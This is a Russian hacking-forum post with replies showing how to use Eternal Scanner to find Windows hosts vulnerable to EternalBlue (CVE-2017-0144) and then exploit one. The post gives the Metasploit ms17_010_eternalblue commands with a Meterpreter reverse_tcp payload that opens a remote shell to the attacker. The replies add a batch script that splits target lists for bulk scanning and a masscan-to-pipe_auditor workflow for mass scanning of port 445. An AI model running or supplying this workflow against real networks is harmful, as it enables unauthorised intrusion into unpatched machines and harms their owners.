Статья Eternal Scanner - Интернет сканер для эксплойтов CVE-2017-0144

Всем привет! В этой статье я хочу продемонстрировать работу сканера, который способен отыскать в сети уязвимые для EternalBlue ( CVE-2017-0144) — кодовое имя эксплойта, эксплуатирующего компьютерную уязвимость в Windows-реализации протокола SMB, хосты.

Итак, собственно – Eternal Scanner.

upload_2017-7-24_22-39-22.png


CVE-2017-0144 Описание:

Сервер SMBv1 в Microsoft Windows Vista SP2; Windows Server 2008 SP2 и R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold и R2; Windows RT 8.1; И Windows 10 Gold, 1511 и 1607; И Windows Server 2016 Позволяет атакующим удаленно выполнять произвольный код с помощью видоизмененных пакетов как в “Windows SMB Remote Code Execution Vulnerability.”. Эта уязвимость отличается от описанной в CVE-2017-0143, CVE-2017-0145, CVE-2017-0146 , И CVE-2017-0148.

Установка:

> git clone https://github.com/peterpt/eternal_scanner

> cd eternal_scanner

> ls –l

upload_2017-7-24_22-39-44.png


Запуск:


> ./escan

upload_2017-7-24_22-40-1.png


Далее, вводим интересующий нас адрес или диапазон, по маске.

upload_2017-7-24_22-40-28.png


Ждем окончания сканирования:
upload_2017-7-24_22-40-42.png


По итогу проверки обнаружилось три хоста уязвимые к данной атаке:

upload_2017-7-24_22-40-57.png


Результаты проверки сканер услужливо сложил в текстовый файлик:

upload_2017-7-24_22-41-20.png


На этом, пожалуй, все, пойду закрывать дырки…

Хотя, сначала, чуть попробую, не соврал ли сканер.

> msfconsole

> use exploit/windows/smb/ms17_010_eternalblue

> msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.158

> msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.180

> msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp

> msf exploit(ms17_010_eternalblue) >exploit

upload_2017-7-24_22-41-51.png


Пока, все идет ровно. И буквально через 30 сек:

upload_2017-7-24_22-42-8.png


Теперь можно идти, спасибо за внимание.
 
Последнее редактирование:
B

bilder

escan -c
идет ошибка, не хочет брать из файла. Питон поставил все вроде установлено как нужно.
Постоянно такая ошибка
Eternal Scanner Vulnerable Ip file was not yet created
Тем не менее escan если указать 1 ip сканит
 

Shinobi

Green Team
23.11.2017
76
14
BIT
0
а как делать сканирование из текстового файла?
нужно еще что нибудь дополнительно устаналвивать для коректной работы?
я вот собственно пробовал делать сканироавния из txt
Команда:
Код:
escan -ck /root/Desktop/ranges.txt -s 3000
Вот что мне выдало:
Код:
cat: /usr/local/share/Eternal_Scanner/pid.tmp: Нет такого файла или каталога
cat: /usr/local/share/Eternal_Scanner/msflog.log: Нет такого файла или каталога
cat: /usr/local/share/Eternal_Scanner/msflog.log: Нет такого файла или каталога
cat: /usr/local/share/Eternal_Scanner/msflog.log: Нет такого файла или каталога
cat: /usr/local/share/Eternal_Scanner/msflog.log: Нет такого файла или каталога

No vulnerable targets were detected from the list
escan -c
идет ошибка, не хочет брать из файла. Питон поставил все вроде установлено как нужно.
Постоянно такая ошибка
Eternal Scanner Vulnerable Ip file was not yet created
Тем не менее escan если указать 1 ip сканит
та же проблема
ручками каждый диапазон проверять как то не комильфо
 
Последнее редактирование:

Shinobi

Green Team
23.11.2017
76
14
BIT
0
вобщем вот что заметил
после 24 часового периода
прочеканные цели
уже утратили свою валидность
 

Shinobi

Green Team
23.11.2017
76
14
BIT
0
Хочу добавить кое-что от себя
Eternal_Scanner чекает за один заход только 500 адресов
Собственно что бы разбить txt на определенное количество строк, создаем bat с последуйщим кодом:
Код:
@Echo Off
SetLocal enabledelayedexpansion
:: Имя исходного текстового файла
Set list=result.txt
:: Число строк в файле на выходе
Set str=500

Set Num=%str%& Set File=0
For /F "tokens=* usebackq delims=" %%i In ("%list%") Do (
    Set /a Num+=1
    If !Num! GEQ %str% (
        Set Num=0
        Set /a File+=1
        Set nFile=0!File!
        Set nFile=!nFile:~-2!
        :: Название частей текстового файла на выходе("list" можно заменить на любое)
        Echo %%i>result_eternal_scanner!nFile!.txt
    ) Else Echo %%i>>result_eternal_scanner!nFile!.txt
)
Pause
Exit
 

Elektrolife

Green Team
21.10.2016
208
33
BIT
25
А сканер из метасплоита умеет проверять хосты из файла ? Я что то не нашёл описания
[automerge]1522655458[/automerge]
Этот сканер какой то странный,проверил половину хостов из списка и повис )
 
Последнее редактирование:

Elektrolife

Green Team
21.10.2016
208
33
BIT
25
а есть инструмент,чтобы по быстрому чекнуть хосты на наличие pipe ? В msf есть auxiliary/scanner/smb/pipe_auditor,но он чекает максимум одну подсеть,не умеет работать с данными из текстовика
 

woolf1514

Green Team
06.03.2017
181
191
BIT
4
а есть инструмент,чтобы по быстрому чекнуть хосты на наличие pipe ? В msf есть auxiliary/scanner/smb/pipe_auditor,но он чекает максимум одну подсеть,не умеет работать с данными из текстовика

Можно попробовать вот так: сначала сканишь masscan'ом на наличие открытого 445 порта, но только так, чтоб вывод был в файл и строчкой. После копируешь все содержимое, открываешь auxiliary/scanner/smb/pipe_auditor, говоришь ему: set RHOSTS <сюда вставляешь эту длиннючую строчку>, затем run. Всю строчку он без проблем схавает и проверит.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!